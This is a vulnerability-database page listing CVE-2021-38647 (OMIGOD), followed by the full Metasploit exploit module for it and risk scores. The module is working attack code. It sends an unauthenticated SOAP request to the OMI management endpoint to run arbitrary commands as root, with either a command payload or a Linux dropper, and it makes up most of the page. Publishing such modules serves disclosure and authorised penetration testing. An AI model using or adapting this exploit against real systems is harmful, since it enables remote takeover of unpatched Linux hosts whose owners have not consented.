Microsoft OMI Management Interface Authentication Bypass Exploit

🗓️ 31 Oct 2021 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 455 Views

Microsoft OMI Management Interface Authentication Bypass. Attacker can issue HTTP request to OMI management endpoint that will cause it to execute OS command as root use

Reporter	Title	Published	Views	Family All 59
GithubExploit	Exploit for CVE-2021-38647	18 Sep 202115:25	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	15 Sep 202121:44	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	22 Sep 202115:20	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	19 Sep 202115:43	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	15 Sep 202104:51	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	16 Sep 202108:33	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	13 Mar 202420:05	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	16 Sep 202102:11	–	githubexploit
GithubExploit	Exploit for CVE-2021-38647	20 Sep 202116:29	–	githubexploit
0day.today	Microsoft OMI Management Interface Authentication Bypass Exploit	10 Nov 202100:00	–	zdt

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft OMI Management Interface Authentication Bypass',
        'Description' => %q{
          By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
          that will cause it to execute an operating system command as the root user. This vulnerability was patched in
          OMI version 1.6.8-1 (released September 8th 2021).
        },
        'Author' => [
          'Nir Ohfeld', # vulnerability discovery & research
          'Shir Tamari', # vulnerability discovery & research
          'Spencer McIntyre', # metasploit module
          'wvu' # vulnerability research
        ],
        'References' => [
          ['CVE', '2021-38647'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],
          ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],
          ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],
          ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']
        ],
        'DisclosureDate' => '2021-09-14',
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 5985,
          'SSL' => false,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'AKA' => ['OMIGOD'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
    ])
  end

  def check
    http_res = send_command('id')
    return CheckCode::Unknown if http_res.nil?
    return CheckCode::Safe unless http_res.code == 200

    cmd_res = parse_response(http_res)
    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /

    return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      result = execute_command(payload.encoded)
      if result
        print_status(result[:stdout]) unless result[:stdout].blank?
        print_error(result[:stderr]) unless result[:stderr].blank?
      end
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
    res = send_command(cmd)

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end

    parse_response(res)
  end

  def parse_response(res)
    return nil unless res&.code == 200

    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
    unless return_code == 0
      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
    end

    {
      return_code: return_code,
      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
    }
  end

  def send_command(cmd)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'text/xml;charset=UTF-8',
      'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
          <s:Header>
            <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>
            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
            <a:ReplyTo>
              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
            </a:ReplyTo>
            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
            <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
            <w:OptionSet s:mustUnderstand="true"/>
            <w:SelectorSet>
              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
            </w:SelectorSet>
          </s:Header>
          <s:Body>
            <p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
              <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>
              <p:Arguments/>
              <p:timeout>0</p:timeout>
              <p:b64encoded>true</p:b64encoded>
            </p:ExecuteScript_INPUT>
          </s:Body>
        </s:Envelope>
      ENVELOPE
    )
  end
end

31 Oct 2021 00:00Current

1.1Low risk

Vulners AI Score1.1

CVSS 3.19.8

CVSS 27.5

EPSS0.94392

microsoft. omi. management interface. authentication bypass. http request. operating system command. vulnerability. cve-2021-38647. omi version 1.6.8-1. metasploit. unix. linux. command execution. security. disclosure date. privilege escalation. remote exploit. csrf. nonce